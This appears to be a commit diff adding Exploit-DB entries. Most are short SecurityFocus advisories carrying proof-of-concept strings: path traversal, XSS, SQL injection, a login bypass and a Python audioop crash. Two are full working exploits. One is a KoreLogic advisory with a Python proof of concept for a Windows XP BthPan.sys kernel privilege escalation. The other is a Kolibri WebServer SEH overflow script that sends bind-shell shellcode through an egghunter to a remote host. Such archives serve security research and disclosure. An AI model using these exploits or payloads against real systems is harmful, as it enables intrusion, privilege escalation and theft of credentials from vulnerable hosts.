platforms/php/webapps/34139.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40834/info
Yamamah Photo Gallery is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Yamamah 1.00 is vulnerable; other versions may also be affected.
http://www.example.com/themes/default/download.php?dfownload=../../includes/config.inc.php

10
platforms/php/webapps/34140.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40838/info
AneCMS is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
AneCMS 1.3 is vulnerable; other versions may also be affected.
hello <script>alert(document.cookie)</script>

9
platforms/php/webapps/34141.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40840/info
AneCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AneCMS 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/blog/1+ANY_SQL_CODE_HERE/Demo_of_ANE_CMS#comment-63

10
platforms/php/webapps/34142.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40841/info
MODx is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MODx 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/manager/index.php?id=4%27+ANY_SQL&a=16
http://www.example.com/manager/index.php?a=106%27+ANY_SQL_HERE

9
platforms/php/webapps/34144.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40860/info
The 'com_easygb' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The following example URI is available:
http://www.example.com/index.php?option=com_easygb&Itemid=[XSS]

11
platforms/php/webapps/34146.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40869/info
Sell@Site PHP Online Jobs is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data are available:
Username: a' or '1'='1
Password: a' or '1'='1

9
platforms/php/webapps/34147.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40880/info
JForum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
JForum 2.1.8 is vulnerable; other versions may also be affected.
http://www.example.com/jforum/jforum.page?action=findUser&module=pm&username=â?<3F>><script src=â?<3F>http://example.org/test.jsâ?<3F>></script><div

7
platforms/unix/dos/34145.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40863/info
The 'audioop' module for Python is prone to a memory-corruption vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
$ python -c "import audioop; audioop.reverse('X', 2)"

226
platforms/windows/local/34131.py Executable file
View file

@ -0,0 +1,226 @@
"""
Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-002
Publication Date: 2014-07-18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt
1. Vulnerability Details
Affected Vendor: Microsoft
Affected Product: Bluetooth Personal Area Networking
Affected Versions: 5.1.2600.5512
Platform: Microsoft Windows XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Privilege Escalation
Attack vector: IOCTL
CVE ID: CVE-2014-4971
2. Vulnerability Description
A vulnerability within the BthPan module allows an attacker to
inject memory they control into an arbitrary location they
define. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently
calling NtQueryIntervalProfile.
3. Technical Description
A userland process can create a handle into the BthPan device
and subsequently make DeviceIoControlFile() calls into that
device. During the IRP handler routine for 0x0012b814 the user
provided OutputBuffer address is not validated. This allows an
attacker to specify an arbitrary address and write
(or overwrite) the memory residing at the specified address.
This is classicaly known as a write-what-where vulnerability and
has well known exploitation methods associated with it.
A stack trace from our fuzzing can be seen below. In our fuzzing
testcase, the specified OutputBuffer in the DeviceIoControlFile()
call is 0xffff0000.
STACK_TEXT:
b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3
b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b
b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21
b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.
Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'
command shows the fault originating in the bthpan driver.
FOLLOWUP_IP:
bthpan!BthpanReqAdd+16b
b272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)
Reviewing the TRAP_FRAME at the time of crash we can see
IopCompleteRequest() copying data from InputBuffer into the
OutputBuffer. InputBuffer is another parameter provided to the
DeviceIoControlFile() function and is therefore controllable by
the attacker. The edi register contains the invalid address
provided during the fuzz testcase.
TRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)
ErrCode = 00000002
eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000
eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203
nt!IopCompleteRequest+0x92:
804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
A write-what-where vulnerability can be leveraged to obtain
escalated privileges. To do so, an attacker will need to
allocate memory in userland that is populated with shellcode
designed to find the Token for PID 4 (System) and then overwrite
the token for its own process. By leveraging the vulnerability
in BthPan it is then possible to overwrite the pointer at
HalDispatchTable+0x4 with a pointer to our shellcode. Calling
NtQueryIntervalProfile() will subsequently call
HalDispatchTable+0x4, execute our shellcode, and elevate the
privilege of the exploit process.
4. Mitigation and Remediation Recommendation
None. A patch is not likely to be forthcoming from the vendor.
5. Credit
This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.
6. Disclosure Timeline
2014.04.28 - Initial contact; sent Microsoft report and PoC.
2014.04.28 - Microsoft acknowledges receipt of vulnerability
report; states XP is no longer supported and asks if
the vulnerability affects other versions of Windows.
2014.04.29 - KoreLogic asks Microsoft for clarification of their
support policy for XP.
2014.04.29 - Microsoft says XP-only vulnerabilities will not be
addressed with patches.
2014.04.29 - KoreLogic asks if Microsoft intends to address the
vulnerability report.
2014.04.29 - Microsoft opens case to investigate the impact of the
vulnerability on non-XP systems.
2014.05.06 - Microsoft asks again if this vulnerability affects
non-XP systems.
2014.05.14 - KoreLogic informs Microsoft that the vulnerability
report is for XP and other Windows versions have not
been examined.
2014.06.11 - KoreLogic informs Microsoft that 30 business days have
passed since vendor acknowledgement of the initial
report. KoreLogic requests CVE number for the
vulnerability, if there is one. KoreLogic also
requests vendor's public identifier for the
vulnerability along with the expected disclosure date.
2014.06.11 - Microsoft informs KoreLogic that the vulnerability
does not impact any "up-platform" products. Says they
are investigating embedded platforms. Does not provide
CVE number.
2014.06.24 - Microsoft contacts KoreLogic to say that they confused
the report of this vulnerability with another and that
they cannot reproduce the described behavior.
Microsoft asks for an updated Proof-of-Concept, crash
dumps or any further analysis of the vulnerability
that KoreLogic can provide.
2014.06.25 - KoreLogic provides Microsoft with an updated
Proof-of-Concept which demonstrates using the
vulnerability to spawn a system shell.
2014.06.30 - KoreLogic asks Microsoft for confirmation of their
receipt of the updated PoC. Also requests that a CVE
ID be issued for this vulnerability.
2014.07.02 - 45 business days have elapsed since Microsoft
acknowledged receipt of the vulnerability report and
PoC.
2014.07.07 - KoreLogic requests CVE from MITRE.
2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be
identical to KL-001-2014-003 and issues CVE-2014-4971
for both vulnerabilities.
2014.07.18 - Public disclosure.
7. Proof of Concept
"""
#!/usr/bin/python2
#
# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack)
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit
EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them
def getBase(name=None):
retArray = c_ulong*1024
ImageBase = retArray()
callback = c_int(1024)
cbNeeded = c_long()
EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
for base in ImageBase:
driverName = c_char_p("\x00"*1024)
GetDeviceDriverBaseNameA(base,driverName,48)
if (name):
if (driverName.value.lower() == name):
return base
else:
return (base,driverName.value)
return None
handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
if (handle == INVALID_HANDLE_VALUE):
print "[!] Could not open handle to BthPan"
exit(1)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
exit(0)
"""
The contents of this advisory are copyright(c) 2014 KoreLogic, Inc.
and are licensed under a Creative Commons Attribution Share-Alike 4.0
(United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a proven
track record of providing security services to entities ranging from
Fortune 500 to small and mid-sized companies. We are a highly skilled
team of senior security consultants doing by-hand security assessments
for the most important networks in the U.S. and around the world. We
are also developers of various tools and resources aimed at helping
the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
"""

118
platforms/windows/remote/34059.py Executable file
View file

@ -0,0 +1,118 @@
#!/usr/bin/python
# Exploit Title : Kolibri WebServer 2.0 Get Request SEH Exploit
# Exploit Author : Revin Hadi S
# Date : 14/07/2014
# Vendor : http://www.senkas.com
# Version : 2.0
# Tested on : Windows XP SP2 Eng, Windows Server 2003 Eng, Win 7 SP1 Eng
import socket, sys
help = """Kolibri WebServer 2.0 Get Request SEH Exploit
Target
[1]Windows XP SP2 Eng & Windows 2003 SP2 Eng
[2]Windows 7 SP1 Eng
Usage : %s [rhost] [port] [target]""" %sys.argv[0]
try:
script, rhost, port, target = sys.argv
except ValueError:
print help
exit()
try:
port = int(port)
target = int(target)
except ValueError:
print "Port & Target should number !"
exit()
#msfpayload windows/shell_bind_tcp LPORT=5698 R | msfencode -a x86 -e x86/alpha_mixed -t c
shellcode = ("\x89\xe2\xd9\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x39\x6c\x79\x78\x6f\x79\x75\x50\x57\x70\x53\x30\x65\x30\x6f"
"\x79\x68\x65\x50\x31\x69\x42\x71\x74\x6c\x4b\x43\x62\x46\x50"
"\x6e\x6b\x61\x42\x74\x4c\x6c\x4b\x66\x32\x35\x44\x4e\x6b\x33"
"\x42\x64\x68\x66\x6f\x6c\x77\x51\x5a\x37\x56\x75\x61\x79\x6f"
"\x30\x31\x49\x50\x6e\x4c\x65\x6c\x73\x51\x53\x4c\x45\x52\x46"
"\x4c\x67\x50\x49\x51\x48\x4f\x56\x6d\x53\x31\x38\x47\x39\x72"
"\x4a\x50\x72\x72\x36\x37\x4e\x6b\x62\x72\x54\x50\x6c\x4b\x43"
"\x72\x55\x6c\x36\x61\x6e\x30\x6e\x6b\x33\x70\x72\x58\x6e\x65"
"\x39\x50\x52\x54\x50\x4a\x47\x71\x6e\x30\x32\x70\x4c\x4b\x72"
"\x68\x35\x48\x4e\x6b\x50\x58\x45\x70\x45\x51\x4e\x33\x6d\x33"
"\x35\x6c\x43\x79\x4c\x4b\x64\x74\x4c\x4b\x57\x71\x49\x46\x55"
"\x61\x79\x6f\x50\x31\x6f\x30\x4e\x4c\x39\x51\x48\x4f\x44\x4d"
"\x37\x71\x59\x57\x64\x78\x79\x70\x53\x45\x69\x64\x76\x63\x33"
"\x4d\x79\x68\x37\x4b\x53\x4d\x45\x74\x30\x75\x58\x62\x30\x58"
"\x4c\x4b\x31\x48\x67\x54\x36\x61\x78\x53\x53\x56\x6c\x4b\x74"
"\x4c\x50\x4b\x4c\x4b\x53\x68\x47\x6c\x36\x61\x48\x53\x6c\x4b"
"\x76\x64\x4c\x4b\x73\x31\x4a\x70\x4b\x39\x33\x74\x61\x34\x47"
"\x54\x33\x6b\x71\x4b\x70\x61\x50\x59\x52\x7a\x50\x51\x4b\x4f"
"\x6d\x30\x31\x48\x43\x6f\x53\x6a\x6c\x4b\x66\x72\x38\x6b\x6c"
"\x46\x53\x6d\x70\x68\x34\x73\x36\x52\x33\x30\x53\x30\x52\x48"
"\x72\x57\x50\x73\x45\x62\x53\x6f\x76\x34\x51\x78\x72\x6c\x62"
"\x57\x46\x46\x47\x77\x79\x6f\x78\x55\x78\x38\x4e\x70\x35\x51"
"\x45\x50\x53\x30\x35\x79\x6a\x64\x31\x44\x76\x30\x71\x78\x61"
"\x39\x6d\x50\x50\x6b\x35\x50\x49\x6f\x6a\x75\x32\x70\x30\x50"
"\x72\x70\x66\x30\x61\x50\x36\x30\x31\x50\x50\x50\x51\x78\x68"
"\x6a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x38\x55\x4b\x39\x38\x47"
"\x44\x71\x79\x4b\x43\x63\x31\x78\x37\x72\x67\x70\x52\x36\x47"
"\x32\x6f\x79\x4a\x46\x72\x4a\x72\x30\x46\x36\x50\x57\x52\x48"
"\x79\x52\x79\x4b\x74\x77\x30\x67\x59\x6f\x58\x55\x46\x33\x61"
"\x47\x53\x58\x6e\x57\x69\x79\x65\x68\x59\x6f\x59\x6f\x69\x45"
"\x46\x33\x30\x53\x76\x37\x50\x68\x74\x34\x78\x6c\x47\x4b\x48"
"\x61\x6b\x4f\x4a\x75\x43\x67\x4d\x59\x38\x47\x65\x38\x61\x65"
"\x70\x6e\x70\x4d\x61\x71\x79\x6f\x39\x45\x70\x68\x31\x73\x50"
"\x6d\x31\x74\x67\x70\x6f\x79\x39\x73\x32\x77\x52\x77\x70\x57"
"\x66\x51\x68\x76\x73\x5a\x54\x52\x46\x39\x63\x66\x69\x72\x69"
"\x6d\x61\x76\x4a\x67\x33\x74\x76\x44\x65\x6c\x55\x51\x73\x31"
"\x6c\x4d\x43\x74\x31\x34\x32\x30\x4a\x66\x67\x70\x57\x34\x56"
"\x34\x36\x30\x30\x56\x56\x36\x30\x56\x43\x76\x42\x76\x32\x6e"
"\x71\x46\x36\x36\x70\x53\x46\x36\x55\x38\x33\x49\x78\x4c\x37"
"\x4f\x6b\x36\x49\x6f\x49\x45\x4b\x39\x59\x70\x50\x4e\x31\x46"
"\x50\x46\x49\x6f\x50\x30\x42\x48\x36\x68\x4e\x67\x35\x4d\x73"
"\x50\x6b\x4f\x59\x45\x6f\x4b\x4c\x30\x48\x35\x4f\x52\x33\x66"
"\x63\x58\x6d\x76\x5a\x35\x6f\x4d\x6f\x6d\x69\x6f\x58\x55\x77"
"\x4c\x63\x36\x33\x4c\x56\x6a\x6b\x30\x69\x6b\x4d\x30\x53\x45"
"\x45\x55\x4f\x4b\x70\x47\x52\x33\x44\x32\x52\x4f\x51\x7a\x63"
"\x30\x66\x33\x6b\x4f\x78\x55\x41\x41")
#egghunter's tag : doge
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x64\x6f\x67\x65\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
if target == 1:
buff = 792
elif target == 2:
buff = 794
else:
print "Input Target option's number !"
exit()
buffer = "\x90"*(buff-20-32-4)
buffer += egghunter
buffer += "\x90"*20
buffer += "\xEB\xBA\x90\x90"
buffer += "\xC2\x15\x40" #/p/p/r kolibri.exe
eggshell = "dogedoge"+shellcode
evil = (
"GET /"+buffer+" HTTP/1.1\r\n"
"Host: "+eggshell+"\r\n"
"User-Agent: kepo\r\n"
"Connection: close\r\n\r\n")
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((rhost, port))
except socket.error:
print "[!]Host down or unreachable !"
exit()
s.send(evil)
s.close()
print "Exploit sended ! Wait a minute the egghunter may take a while to find the tag..."

9
platforms/windows/remote/34143.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40852/info
XnView is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Versions prior to XnView 1.97.5 are vulnerable.
http://www.exploit-db.com/sploits/34143.rar